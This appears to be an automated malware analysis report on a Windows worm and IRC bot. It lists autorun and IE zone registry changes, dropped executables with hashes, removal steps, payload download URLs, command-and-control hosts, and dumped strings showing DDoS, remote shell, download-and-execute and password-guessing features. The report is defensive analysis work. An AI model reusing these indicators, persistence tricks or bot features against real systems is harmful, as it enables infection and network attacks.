[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\L75C]
"hggjgh.exe" = "hggjgh"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process iexplorer.exe:1652 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 29 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\ASProtect]
"Microsoft" = "iexplorer.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "73 95 6A 96 FF 85 5B C8 1C 64 4E E0 63 AD 95 FF"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Runservices]
"Microsoft" = "iexplorer.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Microsoft" = "iexplorer.exe"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process iexplorer.exe:596 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8A F0 DF 4F FA C7 18 F0 8C 56 BB 24 8E 9F AF 51"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
Dropped PE files
MD5 | File path |
---|---|
c2f4665324cbe99a8845e51ea22ec2e5 | c:\Documents and Settings\"%CurrentUserName%"\J50H\20.exe |
a49236b08836f4a372b842ead2643c5b | c:\Documents and Settings\"%CurrentUserName%"\J50H\rep.exe |
30629889480fb1c2aeb17e62f01c8a47 | c:\Documents and Settings\"%CurrentUserName%"\L75C\hggjgh.exe |
d7f364e0153aadb8cc37f09b3fe4d3ec | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\120[1].exe |
93a561b4d6e39d2b962ef9bcf45fba63 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\rep[1].exe |
a49236b08836f4a372b842ead2643c5b | c:\WINDOWS\csrss.exe |
93a561b4d6e39d2b962ef9bcf45fba63 | c:\WINDOWS\system.exe |
c2f4665324cbe99a8845e51ea22ec2e5 | c:\WINDOWS\system32\iexplorer.exe |
30629889480fb1c2aeb17e62f01c8a47 | c:\WINDOWS\system32\pwyqire.exe |
d7f364e0153aadb8cc37f09b3fe4d3ec | c:\WINDOWS\systemj.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Trojan's file once a user opens a drive's folder in Windows Explorer.
A worm can spread its copies through the MSN Messenger.
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
pwyqire.exe:1312
rep.exe:1920
rep.exe:292
20.exe:464
20.exe:2012
hggjgh.exe:656
hggjgh.exe:1884
systemj.exe:456
system.exe:1088
%original file name%.exe:1036
iexplorer.exe:596
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\L43K77.DQ9 (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\aut2.tmp (1249 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\120[1].exe (588384 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\rep[1].exe (483032 bytes)
%WinDir%\systemj.exe (589016 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab8.tmp (54 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar4.tmp (2712 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@dropbox[1].txt (169 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\2BF68F4714092295550497DD56F57004 (816 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar6.tmp (2712 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@www.dropbox[2].txt (373 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab7.tmp (54 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@dropbox[2].txt (169 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab5.tmp (54 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (4916 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@www.dropbox[1].txt (511 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\2BF68F4714092295550497DD56F57004 (36 bytes)
%WinDir%\system.exe (483944 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar9.tmp (2712 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab3.tmp (54 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TarA.tmp (2712 bytes)
%WinDir%\csrss.exe (5441 bytes)
%Documents and Settings%\%current user%\Q32K34.WE9 (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\autB.tmp (1137 bytes)
%Documents and Settings%\%current user%\I75K82.HU9 (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\autC.tmp (1241 bytes)
%System%\iexplorer.exe (5873 bytes)
%System%\pwyqire.exe (5441 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\aut1.tmp (1249 bytes)
%Documents and Settings%\%current user%\J50H\20.exe (9665 bytes)
%Documents and Settings%\%current user%\J50H\rep.exe (9665 bytes)
%Documents and Settings%\%current user%\L75C\hggjgh.exe (10537 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\autD.tmp (1241 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices]
"Supports RAS Connections" = "pwyqire.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Supports RAS Connections" = "pwyqire.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Supports RAS Connections" = "pwyqire.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Runservices]
"Supports RAS Connections" = "pwyqire.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Remote Registry Service" = "csrss.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Runservices]
"Microsoft" = "iexplorer.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Microsoft" = "iexplorer.exe"
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Find and delete all copies of the worm's file together with "autorun.inf" scripts on removable drives.
- Reboot the computer.
Static Analysis
VersionInfo
Company Name:
Product Name:
Product Version:
Legal Copyright:
Legal Trademarks:
Original Filename:
Internal Name:
File Version:
File Description:
Comments:
Language: Language Neutral
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 74526 | 74752 | 4.54396 | a8692f5ba740240ef0f9a827376f76f9 |
.rdata | 81920 | 7445 | 7680 | 3.46159 | d4f36accffde0bf520f52486679ccf0d |
.data | 90112 | 96036 | 512 | 2.46008 | b6c7edb5b7fec47a37a622cc5d71f3f4 |
.CRT | 188416 | 32 | 512 | 0.273198 | 439411041ee0b8261668525c5c132cd9 |
.rsrc | 192512 | 16660 | 16896 | 3.52343 | a2121b436cc4d10fcdfe9bc7fe4dbc2f |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://www.v.dropbox.com/s/yec4ibud71nzl4k/120.exe?dl=1 | |
hxxp://www.v.dropbox.com/s/eniahgllsch8thw/rep.exe?dl=1 | |
hxxp://a26.ms.akamai.net/msdownload/update/v3/static/trustedr/en/authrootseq.txt | |
hxxp://a26.ms.akamai.net/msdownload/update/v3/static/trustedr/en/2796BAE63F1801E277261BA0D77770028F20EEE4.crt | |
hxxp://www.whatismyip.com/ | 141.101.120.14 |
hxxp://checkip.dyndns.com/ | |
hxxp://www.dropbox.com/s/yec4ibud71nzl4k/120.exe?dl=1 | 108.160.167.202 |
hxxp://www.dropbox.com/s/eniahgllsch8thw/rep.exe?dl=1 | 108.160.167.202 |
hxxp://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootseq.txt | 212.30.134.177 |
hxxp://checkip.dyndns.org/ | 216.146.43.70 |
hxxp://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/2796BAE63F1801E277261BA0D77770028F20EEE4.crt | 212.30.134.177 |
videos.p0rn-lover.us | 5.39.78.105 |
frozynv.odin2-valhall.com | 23.236.134.61 |
dl.dropboxusercontent.com | 23.23.132.156 |
vids.p0rn-lover.us | 5.39.78.105 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET / HTTP/1.1
Host: VVV.whatismyip.com
Cache-Control: no-cache
HTTP/1.1 403 Forbidden
Server: cloudflare-nginx
Date: Tue, 29 Jul 2014 22:51:01 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d5395722fd299f75e2ad4583fe2730e0f1406674261320; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.whatismyip.com; HttpOnly
Vary: Accept-Encoding
CF-RAY: 151ce0f54a000551-VIE
GET / HTTP/1.1
Host: checkip.dyndns.org
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: text/html
Server: DynDNS-CheckIP/1.0
Connection: close
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 107
<html><head><title>Current IP Check</title></head><body>Current IP Address: 193.138.244.231</body></html>....
GET / HTTP/1.1
Host: checkip.dyndns.org
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: text/html
Server: DynDNS-CheckIP/1.0
Connection: close
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 107
<html><head><title>Current IP Check</title></head><body>Current IP Address: 193.138.244.231</body></html>....
GET /msdownload/update/v3/static/trustedr/en/authrootseq.txt HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: VVV.download.windowsupdate.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 12 Mar 2014 05:29:31 GMT
Accept-Ranges: bytes
ETag: "806f4cbb43dcf1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 18
Cache-Control: max-age=2736
Date: Tue, 29 Jul 2014 22:50:46 GMT
Connection: keep-alive
X-CCC: RU
X-CID: 2
1401CF3DB40B609892
GET / HTTP/1.1
Host: VVV.whatismyip.com
Cache-Control: no-cache
HTTP/1.1 403 Forbidden
Server: cloudflare-nginx
Date: Tue, 29 Jul 2014 22:51:01 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d5395722fd299f75e2ad4583fe2730e0f1406674261320; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.whatismyip.com; HttpOnly
Vary: Accept-Encoding
CF-RAY: 151ce0f54a010551-VIE
GET / HTTP/1.1
Host: VVV.whatismyip.com
Cache-Control: no-cache
HTTP/1.1 403 Forbidden
Server: cloudflare-nginx
Date: Tue, 29 Jul 2014 22:51:01 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d5ef63b2783e4be02942676df66a2d2e71406674261595; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.whatismyip.com; HttpOnly
Vary: Accept-Encoding
CF-RAY: 151ce0f6fa580551-VIE
GET /msdownload/update/v3/static/trustedr/en/authrootseq.txt HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: VVV.download.windowsupdate.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 12 Mar 2014 05:29:31 GMT
Accept-Ranges: bytes
ETag: "806f4cbb43dcf1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 18
Cache-Control: max-age=2736
Date: Tue, 29 Jul 2014 22:50:46 GMT
Connection: keep-alive
X-CCC: RU
X-CID: 2
1401CF3DB40B609892....
GET /msdownload/update/v3/static/trustedr/en/2796BAE63F1801E277261BA0D77770028F20EEE4.crt HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: VVV.download.windowsupdate.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Content-Type: application/x-x509-ca-cert
Last-Modified: Fri, 11 Feb 2005 03:05:40 GMT
Accept-Ranges: bytes
ETag: "05a791e6fc51:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 1028
Date: Tue, 29 Jul 2014 22:50:46 GMT
Connection: keep-alive
X-CCC: RU
X-CID: 2
GET /msdownload/update/v3/static/trustedr/en/2796BAE63F1801E277261BA0D77770028F20EEE4.crt HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: VVV.download.windowsupdate.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Content-Type: application/x-x509-ca-cert
Last-Modified: Fri, 11 Feb 2005 03:05:40 GMT
Accept-Ranges: bytes
ETag: "05a791e6fc51:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 1028
Date: Tue, 29 Jul 2014 22:50:47 GMT
Connection: keep-alive
X-CCC: RU
X-CID: 2
GET /s/yec4ibud71nzl4k/120.exe?dl=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible)
Host: VVV.dropbox.com
HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Tue, 29 Jul 2014 22:50:44 GMT
Content-Type: text/html
Content-Length: 178
Connection: keep-alive
Location: hXXps://VVV.dropbox.com/s/yec4ibud71nzl4k/120.exe?dl=1
<html>..<head><title>301 Moved Permanently</title></head>..<body bgcolor="white">..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>....
GET /s/eniahgllsch8thw/rep.exe?dl=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible)
Host: VVV.dropbox.com
HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Tue, 29 Jul 2014 22:50:44 GMT
Content-Type: text/html
Content-Length: 178
Connection: keep-alive
Location: hXXps://VVV.dropbox.com/s/eniahgllsch8thw/rep.exe?dl=1
<html>..<head><title>301 Moved Permanently</title></head>..<body bgcolor="white">..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>....
GET / HTTP/1.1
Host: checkip.dyndns.org
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: text/html
Server: DynDNS-CheckIP/1.0
Connection: close
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 107
<html><head><title>Current IP Check</title></head><body>Current IP Address: 193.138.244.231</body></html>....
Map
The Trojan connects to the servers at the following location(s):
Strings from Dumps
pwyqire.exe_500:
.text
`.rdata
@.data
_WSSh
t1SSSSh
PeekNamedPipe
CreatePipe
KERNEL32.dll
WS2_32.dll
GetCPInfo
%d. %s = %s
[%.2d-%.2d-M %.2d:%.2d:%.2d] %s
[DDoS]: Send error: <%d>.
ddos.random
ddos.ack
ddos.syn
[DOWNLOAD]: Bad URL, or DNS Error: %s.
[UPDATE]: Update failed: Error executing file: %s.
[UPDATE]: Downloaded %.1fKB to %s @ %.1fKB/sec. Updating.
[DOWNLOAD]: Opened: %s.
[DOWNLOAD]: Downloaded %.1f KB to %s @ %.1f KB/sec.
[DOWNLOAD]: CRC Failed (%d != %d).
[DOWNLOAD]: Filesize is incorrect: (%d != %d).
[DOWNLOAD]: Update: %s (%dKB transferred).
[DOWNLOAD]: File download: %s (%dKB transferred).
[DOWNLOAD]: Couldn't open file: %s.
[IDENTD]: Error: server failed, returned: <%d>.
: USERID : UNIX : %s
[IDENTD]: Client connection from IP: %s:%d.
%s %s :%s
PRIVMSG
avicap32.dll
SQLDisconnect
SQLFreeHandle
SQLAllocHandle
SQLExecDirect
SQLSetEnvAttr
SQLDriverConnect
odbc32.dll
ShellExecuteA
shell32.dll
mpr.dll
iphlpapi.dll
dnsapi.dll
netapi32.dll
icmp.dll
Mozilla/4.0 (compatible)
InternetCrackUrlA
InternetOpenUrlA
HttpSendRequestA
HttpOpenRequestA
wininet.dll
ws2_32.dll
gdi32.dll
RegCloseKey
RegCreateKeyExA
RegOpenKeyExA
advapi32.dll
ExitWindowsEx
user32.dll
kernel32.dll
Avicap32.dll failed. <%d>
Odbc32.dll failed. <%d>
Shell32.dll failed. <%d>
Mpr32.dll failed. <%d>
Iphlpapi.dll failed. <%d>
Dnsapi.dll failed. <%d>
Netapi32.dll failed. <%d>
Icmp.dll failed. <%d>
Wininet.dll failed. <%d>
Ws2_32.dll failed. <%d>
Gdi32.dll failed. <%d>
Advapi32.dll failed. <%d>
User32.dll failed. <%d>
Kernel32.dll failed. <%d>
videos.p0rn-lover.us
support.exe
Supports RAS Connections
g.dat
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\RunServices
winpass
sqlpassoainstall
databasepassword
databasepass
dbpassword
dbpass
domainpassword
domainpass
loginpass
login
windows
1234567890
123456789
12345678
1234567
pass1234
passwd
password
password1
*@fbi.edu
Ý %dh %dm
[NETINFO]: [Type]: %s (%s). [IP Address]: %s. [Hostname]: %s.
[IDENTD]: Failed to start server, error: <%d>.
[IDENTD]: Server running on Port: 113.
%s %d "%s"
%s\%s
[MAIN]: Connected to %s.
NICK %s
USER %s 0 0 :%s
PASS %s
MODE %s %s
USERHOST %s
[MAIN]: User: %s logged in.
[MAIN]: Password accepted.
[MAIN]: *Failed host auth by: (%s!%s).
NOTICE %s :Host Auth failed (%s!%s).
[MAIN]: *Failed pass auth by: (%s!%s).
NOTICE %s :Your attempt has been logged.
NOTICE %s :Pass auth failed (%s!%s).
[MAIN]: Random nick change: %s
[FTP]: Uploading file: %s to: %s failed.
[FTP]: Uploading file: %s to: %s
ftp.exe
-s:%s
open %s
put %s
%s\%i%i%i.dll
[FTP]: File not found: %s.
[MAIN]: Invalid login slot number: %d.
[MAIN]: No user logged in at slot: %d.
[MAIN]: %s
QUIT :%s
[MAIN]: Status: Ready. Bot Uptime: %s.
[MAIN]: Bot ID: %s.
[THREADS]: Failed to start list thread, error: <%d>.
[MAIN]: Uptime: %s.
[CMD]: Remote shell ready.
[CMD]: Couldn't open remote shell.
[CMD]: Remote shell already running.
[TFTP]: Failed to start server thread, error: <%d>.
[TFTP]: Server started on Port: %d, File: %s, Request: %s.
[TFTP]: Already running.
[MAIN]: Nick changed to: '%s'.
[MAIN]: Joined channel: '%s'.
[MAIN]: Parted channel: '%s'.
[MAIN]: IRC Raw: %s.
[THREADS]: Failed to kill thread: %s.
[THREADS]: Killed thread: %s.
[THREADS]: Stopped: %d thread(s).
[MAIN]: Prefix changed to: '%c'.
[SHELL]: Couldn't open file: %s
[SHELL]: File opened: %s
[MAIN]: Server changed to: '%s'.
[DNS]: Lookup: %s -> %s.
[FILE]: Deleted '%s'.
[VISIT]: Failed to start connection thread, error: <%d>.
[VISIT]: URL: %s.
[CMD]: Commands: %s
[CMD]: Error sending to remote shell.
[MAIN]: Read file failed: %s
[MAIN]: Read file complete: %s
[MAIN]: Gethost: %s.
[MAIN]: Gethost: %s, Command: %s
[MAIN]: Alias added: %s.
[MAIN]: Privmsg: %s: %s.
[MAIN]: Action: %s: %s.
PART %s
[MAIN]: Mode change: %s
MODE %s
[CLONE]: Raw (%s): %s
[CLONE]: Mode (%s): %s
[CLONE]: Nick (%s): %s
JOIN %s %s
[MAIN]: Repeat not allowed in command line: %s
[MAIN]: Repeat: %s
%s %s %s :%s
[UPDATE]: Failed to start download thread, error: <%d>.
[UPDATE]: Downloading update from: %s.
%s%s.exe
[EXEC]: Commands: %s
[EXEC]: Couldn't execute file.
[CLONES]: Failed to start clone thread, error: <%d>.
[CLONES]: Created on %s:%d, in channel %s.
[DDoS]: Failed to start flood thread, error: <%d>.
[DDoS]: Flooding: (%s:%s) for %s seconds.
[DOWNLOAD]: Failed to start transfer thread, error: <%d>.
[DOWNLOAD]: Downloading URL: %s to: %s.
[REDIRECT]: Failed to start redirection thread, error: <%d>.
[REDIRECT]: TCP redirect created from: %s:%d to: %s:%d.
[SCAN]: Failed to start scan thread, error: <%d>.
[SCAN]: Port scan started: %s:%d with delay: %d(ms).
[%s] <%s> %s
[%s] * %s %s
ACTION %s
[UDP]: Failed to start flood thread, error: <%d>.
[UDP]: Sending %d packets to: %s. Packet size: %d, Delay: %d(ms).
ICMP.dll not available
[PING]: Failed to start flood thread, error: <%d>.
[PING]: Sending %d pings to %s. packet size: %d, timeout: %d(ms).
[EMAIL]: Message sent to %s.
helo $rndnick
mail from: <%s>
rcpt to: <%s>
subject: %s
from: %s
udpflood
c_privmsg
. Failed to start flood thread, error: <%d>.
. Flooding: (%s:%s) for %s seconds.
ddos.supersyn
c_join
c_nick
privmsg
[IDENT]: Server stopped. (%d thread(s) stopped.)
mirccmd
c_rndnick
join
nick
tftp
tftpserver
[MAIN]: Login list complete.
%d. %s
-[Login List]-
[CMD]
cmdstop
ocmd
opencmd
[TFTP]
tftpstop
supersyn.stop
TCP redirect
rndnick
$rndnick
NOTICE %s :
PING %s
VERSION %s
[MAIN]: Joined channel: %s.
[MAIN]: User: %s logged out.
[MAIN]: User: %s logged out.
:%s%s
:%s%s
NICK
NICK
NOTICE %s :%s
NOTICE %s :%s
[MAIN]: User %s logged out.
[MAIN]: User %s logged out.
PONG %s
PONG %s
%s Error: %s <%d>.
%s Error: %s <%d>.
explorer.exe
explorer.exe
%%comspec%% /c %s %s
%%comspec%% /c %s %s
del "%s"
del "%s"
%sdel.bat
%sdel.bat
%d.%d.%d.%d
%d.%d.%d.%d
[PING]: Finished sending pings to %s.
[PING]: Finished sending pings to %s.
[PING]: Error sending pings to %s.
[PING]: Error sending pings to %s.
[UDP]: Finished sending packets to %s.
[UDP]: Finished sending packets to %s.
[UDP]: Error sending pings to %s.
[UDP]: Error sending pings to %s.
[REDIRECT]: Failed to start client thread, error: <%d>.
[REDIRECT]: Failed to start client thread, error: <%d>.
[REDIRECT]: Client connection from IP: %s:%d, Server thread: %d.
[REDIRECT]: Client connection from IP: %s:%d, Server thread: %d.
[REDIRECT]: Failed to start connection thread, error: <%d>.
[REDIRECT]: Failed to start connection thread, error: <%d>.
[REDIRECT]: Client connection to IP: %s:%d, Server thread: %d.
[REDIRECT]: Client connection to IP: %s:%d, Server thread: %d.
PRIVMSG %s :%s
PRIVMSG %s :%s
[CMD]: Could not read data from proccess.
[CMD]: Could not read data from proccess.
[CMD]: Proccess has terminated.
[CMD]: Proccess has terminated.
[CMD]: Could not read data from proccess
[CMD]: Could not read data from proccess
[CMD]: Failed to start IO thread, error: <%d>.
[CMD]: Failed to start IO thread, error: <%d>.
[CMD]: Remote Command Prompt
[CMD]: Remote Command Prompt
cmd.exe
cmd.exe
[%s]|
[%s]|
[%d]%s
[%d]%s
[SCAN]: IP: %s Port: %d is open.
[SCAN]: IP: %s Port: %d is open.
[SCAN]: Scanning IP: %s, Port: %d.
[SCAN]: Scanning IP: %s, Port: %d.
tftp.exe -i get
tftp.exe -i get
IP: %s
IP: %s
[TFTP]: Failed to open file: %s.
[TFTP]: Failed to open file: %s.
[TFTP]: Error: socket() failed, returned: <%d>.
[TFTP]: Error: socket() failed, returned: <%d>.
%s: No %s thread found.
%s: No %s thread found.
%s: %s stopped. (%d thread(s) stopped.)
%s: %s stopped. (%d thread(s) stopped.)
[VISIT]: Failed to connect to HTTP server.
[VISIT]: Failed to connect to HTTP server.
[VISIT]: Invalid URL.
[VISIT]: Invalid URL.
[VISIT]: Failed to get requested URL from HTTP server.
[VISIT]: Failed to get requested URL from HTTP server.
[VISIT]: URL visited.
[VISIT]: URL visited.
zcÁ
zcÁ
[07-30-2014 01:50:55] [DOWNLOAD]: Opened: C:/windows/systemj.exe.
[07-30-2014 01:50:55] [DOWNLOAD]: Opened: C:/windows/systemj.exe.
s/systemj.exe @ 195.8 KB/sec.
s/systemj.exe @ 195.8 KB/sec.
exe?dl=1 to: C:/windows/system.e[07-30-2014 01:50:54] [DOWNLOAD]: Opened: C:/windows/system.exe.
exe?dl=1 to: C:/windows/system.e[07-30-2014 01:50:54] [DOWNLOAD]: Opened: C:/windows/system.exe.
[07-30-2014 01:50:54] [DOWNLOAD]: Downloaded 587.5 KB to C:/windows/systemj.exe @ 195.8 KB/sec.
[07-30-2014 01:50:54] [DOWNLOAD]: Downloaded 587.5 KB to C:/windows/systemj.exe @ 195.8 KB/sec.
